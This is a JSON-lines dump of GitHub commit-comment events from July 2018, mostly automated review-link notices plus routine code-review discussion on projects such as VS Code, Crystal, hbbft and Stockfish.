{"id":"7937568375","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641597,"position":null,"line":null,"path":null,"commit_id":"8cc6131f331e265e5514ef93fc5481822923e921","created_at":"2018-07-09T13:17:45Z","updated_at":"2018-07-09T13:17:45Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=444)"}},"created_at":"2018-07-09T13:17:45Z"}
{"id":"7937568452","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641599,"position":null,"line":null,"path":null,"commit_id":"8cc6131f331e265e5514ef93fc5481822923e921","created_at":"2018-07-09T13:17:46Z","updated_at":"2018-07-09T13:17:46Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:17:46Z"}
{"id":"7937574461","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29641616,"position":null,"line":null,"path":null,"commit_id":"df7206e704d9bdc25e34ca04c0076e983181786b","created_at":"2018-07-09T13:18:50Z","updated_at":"2018-07-09T13:18:50Z","author_association":"CONTRIBUTOR","body":"@Sami32 Good, please log on :)"}},"created_at":"2018-07-09T13:18:50Z"}
{"id":"7937579258","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/IIIF-AV-player"},"payload":{"comment":{"id":29641627,"position":null,"line":null,"path":null,"commit_id":"d3800293196a7ea3173bf2b4e08f561dd33b2a31","created_at":"2018-07-09T13:19:41Z","updated_at":"2018-07-09T13:19:41Z","author_association":"COLLABORATOR","body":"True, as in `id` or `@id`? "}},"created_at":"2018-07-09T13:19:41Z"}
{"id":"7937581270","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641641,"position":null,"line":null,"path":null,"commit_id":"b1a8d2e0d5c05816dea1a853a939b1418ffc5ccb","created_at":"2018-07-09T13:20:03Z","updated_at":"2018-07-09T13:20:03Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=445)"}},"created_at":"2018-07-09T13:20:03Z"}
{"id":"7937581620","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29641645,"position":36,"line":197,"path":"src/main.js","commit_id":"14d8d7cd7491dd80b4841529b4d1c1def9ef4d89","created_at":"2018-07-09T13:20:07Z","updated_at":"2018-07-09T13:20:07Z","author_association":"MEMBER","body":"Are those cosmetic changes? Iff so, then we should also update the usage inside `_nodeCachedDataDir#compute`"}},"created_at":"2018-07-09T13:20:07Z"}
{"id":"7937581732","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641646,"position":null,"line":null,"path":null,"commit_id":"0849a0bfa42e3cb76090f611bdb5f4be143973c3","created_at":"2018-07-09T13:20:08Z","updated_at":"2018-07-09T13:20:08Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=447)"}},"created_at":"2018-07-09T13:20:08Z"}
{"id":"7937581746","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641647,"position":null,"line":null,"path":null,"commit_id":"90251410b5879e6c3dec1da33cf0ab31675a2b8e","created_at":"2018-07-09T13:20:08Z","updated_at":"2018-07-09T13:20:08Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=446)"}},"created_at":"2018-07-09T13:20:08Z"}
{"id":"7937581761","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641648,"position":null,"line":null,"path":null,"commit_id":"415749fde21bbf7e064730cda160af5a7bd79311","created_at":"2018-07-09T13:20:08Z","updated_at":"2018-07-09T13:20:08Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=454)"}},"created_at":"2018-07-09T13:20:08Z"}
{"id":"7937581767","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641651,"position":null,"line":null,"path":null,"commit_id":"508880f08c04579618f8e8a908f9047d061aee1c","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=455)"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581768","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641650,"position":null,"line":null,"path":null,"commit_id":"3cce5f2c28121bb4c5a06d33a1d98afb1d57fdc4","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=450)"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581772","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641652,"position":null,"line":null,"path":null,"commit_id":"7f533d323005ecf5f2b2c1cb411f635049cdb583","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=449)"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581781","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641649,"position":null,"line":null,"path":null,"commit_id":"a67fa25f6a451108041bd7f01ff1ce647e223ad1","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=448)"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581804","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641655,"position":null,"line":null,"path":null,"commit_id":"0849a0bfa42e3cb76090f611bdb5f4be143973c3","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581809","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641654,"position":null,"line":null,"path":null,"commit_id":"1ed1c5fd3960c7c87e491d6cffc6bced56e776fa","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=451)"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581817","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641653,"position":null,"line":null,"path":null,"commit_id":"0ed27caa5a57be5dbef43aee4750d744bc03583f","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=453)"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581823","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641656,"position":null,"line":null,"path":null,"commit_id":"e47c4a64ea00d36597188c309629d9d7a1136e60","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=452)"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581824","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641657,"position":null,"line":null,"path":null,"commit_id":"90251410b5879e6c3dec1da33cf0ab31675a2b8e","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581855","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641659,"position":null,"line":null,"path":null,"commit_id":"415749fde21bbf7e064730cda160af5a7bd79311","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581859","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641660,"position":null,"line":null,"path":null,"commit_id":"a67fa25f6a451108041bd7f01ff1ce647e223ad1","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581867","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641661,"position":null,"line":null,"path":null,"commit_id":"7f533d323005ecf5f2b2c1cb411f635049cdb583","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581872","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641658,"position":null,"line":null,"path":null,"commit_id":"26e25c3003482df41e23dc070a3dbd0f85b0dd28","created_at":"2018-07-09T13:20:09Z","updated_at":"2018-07-09T13:20:09Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=456)"}},"created_at":"2018-07-09T13:20:09Z"}
{"id":"7937581866","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641662,"position":null,"line":null,"path":null,"commit_id":"3cce5f2c28121bb4c5a06d33a1d98afb1d57fdc4","created_at":"2018-07-09T13:20:10Z","updated_at":"2018-07-09T13:20:10Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:10Z"}
{"id":"7937581897","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641663,"position":null,"line":null,"path":null,"commit_id":"1ed1c5fd3960c7c87e491d6cffc6bced56e776fa","created_at":"2018-07-09T13:20:10Z","updated_at":"2018-07-09T13:20:10Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:10Z"}
{"id":"7937581927","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641665,"position":null,"line":null,"path":null,"commit_id":"e47c4a64ea00d36597188c309629d9d7a1136e60","created_at":"2018-07-09T13:20:10Z","updated_at":"2018-07-09T13:20:10Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:10Z"}
{"id":"7937581932","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641664,"position":null,"line":null,"path":null,"commit_id":"0ed27caa5a57be5dbef43aee4750d744bc03583f","created_at":"2018-07-09T13:20:10Z","updated_at":"2018-07-09T13:20:10Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:10Z"}
{"id":"7937581966","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641667,"position":null,"line":null,"path":null,"commit_id":"26e25c3003482df41e23dc070a3dbd0f85b0dd28","created_at":"2018-07-09T13:20:10Z","updated_at":"2018-07-09T13:20:10Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:10Z"}
{"id":"7937581995","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641666,"position":null,"line":null,"path":null,"commit_id":"508880f08c04579618f8e8a908f9047d061aee1c","created_at":"2018-07-09T13:20:10Z","updated_at":"2018-07-09T13:20:10Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:20:10Z"}
{"id":"7937584469","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29641674,"position":null,"line":null,"path":null,"commit_id":"df7206e704d9bdc25e34ca04c0076e983181786b","created_at":"2018-07-09T13:20:36Z","updated_at":"2018-07-09T13:20:36Z","author_association":"CONTRIBUTOR","body":"Please wait a little i'm working on some stuff ;)"}},"created_at":"2018-07-09T13:20:36Z"}
{"id":"7937587317","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":29641678,"position":72,"line":220,"path":"src/http/server.cr","commit_id":"f042096a41f91b6c671b52d3f707ea794590f6c1","created_at":"2018-07-09T13:21:05Z","updated_at":"2018-07-09T13:21:05Z","author_association":"CONTRIBUTOR","body":"`{% end %}`"}},"created_at":"2018-07-09T13:21:05Z"}
{"id":"7937588202","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29641680,"position":null,"line":null,"path":null,"commit_id":"df7206e704d9bdc25e34ca04c0076e983181786b","created_at":"2018-07-09T13:21:12Z","updated_at":"2018-07-09T13:21:12Z","author_association":"CONTRIBUTOR","body":"Ok, I just have some things to tell you.."}},"created_at":"2018-07-09T13:21:12Z"}
{"id":"7937588487","type":"CommitCommentEvent","actor":{"login":"skylightanimation"},"repo":{"name":"skylightanimation/skylightanimation.github.io"},"payload":{"comment":{"id":29641681,"position":null,"line":null,"path":null,"commit_id":"df74c6c1231cdd55deb5e364f6c9d97a8f3a1c2d","created_at":"2018-07-09T13:21:14Z","updated_at":"2018-07-09T13:21:14Z","author_association":"OWNER","body":"post2"}},"created_at":"2018-07-09T13:21:14Z"}
{"id":"7937592472","type":"CommitCommentEvent","actor":{"login":"mutoe"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29641688,"position":null,"line":null,"path":null,"commit_id":"149f205d7c7bdb0562d4d26087d30773a1155721","created_at":"2018-07-09T13:21:55Z","updated_at":"2018-07-09T13:21:55Z","author_association":"COLLABORATOR","body":"忽略yarn.lock有什么考虑吗？会不会导致客户安装的依赖版本与测试环境不一致导致的一些bug？\r\n前段时间就是因为环信的sdk升级到最新版本之后出现了一个奇怪的问题，排查了一天🙃最后锁定了一个没有bug的版本"}},"created_at":"2018-07-09T13:21:55Z"}
{"id":"7937592684","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"MiNote3Dev/android_device_xiaomi_jason"},"payload":{"comment":{"id":29641690,"position":null,"line":null,"path":null,"commit_id":"11f94feed8050c6e19896a70b7671e39cef5d970","created_at":"2018-07-09T13:21:57Z","updated_at":"2018-07-09T13:21:57Z","author_association":"NONE","body":"any progress on this? good work btw"}},"created_at":"2018-07-09T13:21:57Z"}
{"id":"7937593964","type":"CommitCommentEvent","actor":{"login":"takayamamasashi"},"repo":{"name":"takayamamasashi/takayamamasashi.github.io"},"payload":{"comment":{"id":29641693,"position":15,"line":15,"path":"index.html","commit_id":"14c51fe46d6e793d7fbb8937d7f212e6a329c747","created_at":"2018-07-09T13:22:11Z","updated_at":"2018-07-09T13:22:11Z","author_association":"OWNER","body":"Dr"}},"created_at":"2018-07-09T13:22:11Z"}
{"id":"7937596176","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/Learning-Workflow"},"payload":{"comment":{"id":29641697,"position":null,"line":null,"path":null,"commit_id":"753142248c8e062819c2507e4483661069455394","created_at":"2018-07-09T13:22:34Z","updated_at":"2018-07-09T13:22:34Z","author_association":"OWNER","body":"07-09-2018\r\n\r\nStep 1. Go the the Anatomy and Physiology repository at\r\nhttps://github.com/ananthr1/Anatomy-and-Physiology/projects/3\r\n\r\nStep 2. Click the card \"Daily Nano-projects Thortspace sphere\"\r\n\r\nStep 3. Click the link to the Thortspace journal in the side panel on the right.\r\n\r\nStep 4. Do a nano-project.\r\n\r\nStep 5. Click the card \"Daily Nano-projects Spreadsheet\"\r\n\r\nStep 6. Click the link to the Googlesheet in the side panel on the right.\r\n\r\nStep 7.  Mark nano-project as completed.\r\n\r\nRepeat steps 4-7"}},"created_at":"2018-07-09T13:22:34Z"}
{"id":"7937601057","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29641705,"position":36,"line":197,"path":"src/main.js","commit_id":"14d8d7cd7491dd80b4841529b4d1c1def9ef4d89","created_at":"2018-07-09T13:23:25Z","updated_at":"2018-07-09T13:23:25Z","author_association":"MEMBER","body":"ops, forget that... seeing it now"}},"created_at":"2018-07-09T13:23:25Z"}
{"id":"7937604355","type":"CommitCommentEvent","actor":{"login":"joaomoreno"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29641710,"position":36,"line":197,"path":"src/main.js","commit_id":"14d8d7cd7491dd80b4841529b4d1c1def9ef4d89","created_at":"2018-07-09T13:23:59Z","updated_at":"2018-07-09T13:23:59Z","author_association":"MEMBER","body":"Not really cosmetic. This piece of code was accessing `app.getPath('userData')` way too early; the time in which that was set was implicit. Fixed it by removing all usages of `app.getPath('userData')` with a variable we explicitly control when it is set.\r\n\r\nI also changed that occurrence, further down."}},"created_at":"2018-07-09T13:23:59Z"}
{"id":"7937604840","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29641714,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-09T13:24:04Z","updated_at":"2018-07-09T13:24:04Z","author_association":"NONE","body":"I'm in favor to stop this test, it wastes resources with no useful information in return."}},"created_at":"2018-07-09T13:24:04Z"}
{"id":"7937607928","type":"CommitCommentEvent","actor":{"login":"asterite"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":29641723,"position":72,"line":220,"path":"src/http/server.cr","commit_id":"f042096a41f91b6c671b52d3f707ea794590f6c1","created_at":"2018-07-09T13:24:35Z","updated_at":"2018-07-09T13:24:35Z","author_association":"CONTRIBUTOR","body":"Crystal Basic "}},"created_at":"2018-07-09T13:24:35Z"}
{"id":"7937608993","type":"CommitCommentEvent","actor":{"login":"Warboy1982"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29641728,"position":null,"line":null,"path":null,"commit_id":"35588664271e1eb13e6f1da58b3dd9d46d046409","created_at":"2018-07-09T13:24:46Z","updated_at":"2018-07-09T13:24:46Z","author_association":"NONE","body":"[more testing.zip](https://github.com/ohartenstein23/OpenXcom/files/2176299/more.testing.zip)\r\n\r\n:("}},"created_at":"2018-07-09T13:24:46Z"}
{"id":"7937610105","type":"CommitCommentEvent","actor":{"login":"medz"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29641731,"position":null,"line":null,"path":null,"commit_id":"149f205d7c7bdb0562d4d26087d30773a1155721","created_at":"2018-07-09T13:24:58Z","updated_at":"2018-07-09T13:24:58Z","author_association":"MEMBER","body":"@mutoe 锁定版本可以在 package.json 里面控制，忽略 yarn 锁文件是因为本身是 project，其次就是 `yarn.lock` 本身对 npm 是无效的，意义不大，还有就是 `yarn.lock` 会导致其他镜像下载出现异常问题。\r\n\r\nnpm 或者是 yarn 都不是最终银弹，考虑两者之间的中和，并减少对某一个工具的倾向性。\r\n\r\n例如你刚刚说的，可以直接在 `package.json` 锁定一个版本，而不是用版本约束进行。"}},"created_at":"2018-07-09T13:24:58Z"}
{"id":"7937637713","type":"CommitCommentEvent","actor":{"login":"TRC4"},"repo":{"name":"onigetoc/Podcast-parser-for-jPlayer"},"payload":{"comment":{"id":29641797,"position":null,"line":null,"path":null,"commit_id":"ad290602e7828d323e90b235fe48aa1d0fa54668","created_at":"2018-07-09T13:29:45Z","updated_at":"2018-07-09T13:29:45Z","author_association":"NONE","body":"CLOSE THE\r\nif(!$limit) $limit = 20;\r\nAND\r\nif (++$i == $limit) break;\r\nI HAVE TESTING WITH YOUR DEFAULT XML LINKS http://localhost/Podcast-parser-for-jPlayer/assets/podparser.php?callback=123456&Podurl=http://www.hbo.com/podcasts/billmaher/podcast.xml WITH CLOSED THE LIMIT // JSON DATA WORKING PREFECT."}},"created_at":"2018-07-09T13:29:45Z"}
{"id":"7937638861","type":"CommitCommentEvent","actor":{"login":"fradeve"},"repo":{"name":"ubiquitypress/rua"},"payload":{"comment":{"id":29641802,"position":19,"line":19,"path":"src/core/migrations/0167_auto_20180628_1304.py","commit_id":"c94b0f81403805a6ee069069d9dee552b2c2338b","created_at":"2018-07-09T13:29:55Z","updated_at":"2018-07-09T13:29:55Z","author_association":"CONTRIBUTOR","body":"I am not completely sure about this. Unless I am missing something, the location is an absolute directory, pointing to root: `/rua/src/media`. Is that correct?"}},"created_at":"2018-07-09T13:29:55Z"}
{"id":"7937642586","type":"CommitCommentEvent","actor":{"login":"collicott"},"repo":{"name":"collicott/beamtime_schedule"},"payload":{"comment":{"id":29641811,"position":74,"line":725,"path":"app/controllers/UsersController.php","commit_id":"62fcf66aa7f008d78736945601f3e28ccf1e0c09","created_at":"2018-07-09T13:30:31Z","updated_at":"2018-07-09T13:30:31Z","author_association":"OWNER","body":"Good point, the login check is probably redundant \r\n"}},"created_at":"2018-07-09T13:30:31Z"}
{"id":"7937642977","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29641812,"position":null,"line":null,"path":null,"commit_id":"fe6851a2d5fa2d0ea7ad21d9969bae6698f32505","created_at":"2018-07-09T13:30:34Z","updated_at":"2018-07-09T13:30:34Z","author_association":"CONTRIBUTOR","body":"For wicat, the first problem is a MOVE.L instruction that hits invalid memory twice because MAME's M68000 core isn't subcycle-interruptible."}},"created_at":"2018-07-09T13:30:34Z"}
{"id":"7937644585","type":"CommitCommentEvent","actor":{"login":"DrPeterVanNostrand"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29641817,"position":77,"line":287,"path":"src/agreement/mod.rs","commit_id":"17ae0154e3ebca462fbc68c66c0d33d488bc70a0","created_at":"2018-07-09T13:30:49Z","updated_at":"2018-07-09T13:30:49Z","author_association":"CONTRIBUTOR","body":"It doesn't really matter, but you could use `self.output.take()` here. It's slightly more ergonomic in my opinion."}},"created_at":"2018-07-09T13:30:49Z"}
{"id":"7937644950","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29641818,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T13:30:53Z","updated_at":"2018-07-09T13:30:53Z","author_association":"NONE","body":"@vondele I think the problem is that after certain amount of memory allocations, the page table gets fragmented, and since those allocations are small compared to the machine's total memory, it may not trigger any cleanups. I assume this symptom will manifest again after a few days, I could then try to run \"echo 1 > /proc/sys/vm/compact_memory\" to see if it can be solved by this method."}},"created_at":"2018-07-09T13:30:53Z"}
{"id":"7937647965","type":"CommitCommentEvent","actor":{"login":"weduls"},"repo":{"name":"weduls/algorithm"},"payload":{"comment":{"id":29641819,"position":38,"line":38,"path":"문자열 처리/팰린드롬인지 확인하기/gglee/Main.java","commit_id":"e285f2906caa481112ddc19c49b3782064ddf725","created_at":"2018-07-09T13:31:24Z","updated_at":"2018-07-09T13:31:24Z","author_association":"OWNER","body":"rearIndex 값이 primitive 값인데 계속 생성하는게 좋은가요? 아니면 rearIndex 값을 반복문 위에 올리고 rearIndex--;를 하면 어떤가요?\r\n\r\n조사해보고 커멘트 부탁드립니다."}},"created_at":"2018-07-09T13:31:24Z"}
{"id":"7937649117","type":"CommitCommentEvent","actor":{"login":"viki8"},"repo":{"name":"viki8/DevOps"},"payload":{"comment":{"id":29641820,"position":null,"line":null,"path":null,"commit_id":"dff95ade54ba814e99f70c5a5a37363aaa3d924f","created_at":"2018-07-09T13:31:37Z","updated_at":"2018-07-09T13:31:37Z","author_association":"OWNER","body":"updating file"}},"created_at":"2018-07-09T13:31:37Z"}
{"id":"7937653204","type":"CommitCommentEvent","actor":{"login":"medz"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29641833,"position":null,"line":null,"path":null,"commit_id":"149f205d7c7bdb0562d4d26087d30773a1155721","created_at":"2018-07-09T13:32:19Z","updated_at":"2018-07-09T13:32:19Z","author_association":"MEMBER","body":"@mutoe 你提到\r\n> 会不会导致客户安装的依赖版本与测试环境不一致导致的一些bug？\r\n\r\n我的回答是会，但是是容许的会，这样更加限制开发人员对版本选择，和升级的再三缺点。之前对待依赖升级什么的都很随意。4.0 我期望的是不激进。\r\n\r\n还有一个问题，node.js 的 npm 包很多虽然说是符合语义化版本号，但是其实根本没有（至少大多数包没有），这些作者特别随意。所以以此来让后面的开发同学（目前也就是你😂）能更加谨慎考虑依赖。\r\n\r\n最后一个小点，你看到了，4.0 代码是如此的混乱～～～我不想吐槽了，你是第三手了。前两手都把代码越搞越乱，我都不知道例如 Vue.$http 有什么用，正确的做法本身应该把请求抽象为本地文件。而不是直接去调用 API。"}},"created_at":"2018-07-09T13:32:19Z"}
{"id":"7937656097","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29641839,"position":5,"line":560,"path":"Zend/zend_inheritance.c","commit_id":"797e87060ccf1dc54809765d5494488cde7176fb","created_at":"2018-07-09T13:32:49Z","updated_at":"2018-07-09T13:32:49Z","author_association":"CONTRIBUTOR","body":"analog change is possible in line 612, see https://github.com/php/php-src/pull/3379"}},"created_at":"2018-07-09T13:32:49Z"}
{"id":"7937656610","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"charlorr/TikTalk"},"payload":{"comment":{"id":29641841,"position":null,"line":null,"path":null,"commit_id":"ab4922f4ffdb77dd760edf80d5dbb1bfc7cb4dbd","created_at":"2018-07-09T13:32:55Z","updated_at":"2018-07-09T13:32:55Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-09T13:32:55Z"}
{"id":"7937661593","type":"CommitCommentEvent","actor":{"login":"DrPeterVanNostrand"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29641860,"position":80,"line":198,"path":"src/broadcast.rs","commit_id":"17ae0154e3ebca462fbc68c66c0d33d488bc70a0","created_at":"2018-07-09T13:33:47Z","updated_at":"2018-07-09T13:33:47Z","author_association":"CONTRIBUTOR","body":"Same comment as above regarding `.take()` vs `replace()`."}},"created_at":"2018-07-09T13:33:47Z"}
{"id":"7937661757","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29641861,"position":77,"line":287,"path":"src/agreement/mod.rs","commit_id":"17ae0154e3ebca462fbc68c66c0d33d488bc70a0","created_at":"2018-07-09T13:33:49Z","updated_at":"2018-07-09T13:33:49Z","author_association":"CONTRIBUTOR","body":"I'll use it!"}},"created_at":"2018-07-09T13:33:49Z"}
{"id":"7937666213","type":"CommitCommentEvent","actor":{"login":"medz"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29641870,"position":null,"line":null,"path":null,"commit_id":"149f205d7c7bdb0562d4d26087d30773a1155721","created_at":"2018-07-09T13:34:35Z","updated_at":"2018-07-09T13:34:35Z","author_association":"MEMBER","body":"@mutoe 最后一点，我不是专业前端。。。主要还是做架构，这个 project 你维护期间，你如何考虑，你可以做主。😂我提交的有问题，可以给我一个不应该这么做的理由，说服我我就 revert 。辛苦拉～"}},"created_at":"2018-07-09T13:34:35Z"}
{"id":"7937666228","type":"CommitCommentEvent","actor":{"login":"terrasea2"},"repo":{"name":"ubiquitypress/rua"},"payload":{"comment":{"id":29641869,"position":19,"line":19,"path":"src/core/migrations/0167_auto_20180628_1304.py","commit_id":"c94b0f81403805a6ee069069d9dee552b2c2338b","created_at":"2018-07-09T13:34:35Z","updated_at":"2018-07-09T13:34:35Z","author_association":"CONTRIBUTOR","body":"Seems that way"}},"created_at":"2018-07-09T13:34:35Z"}
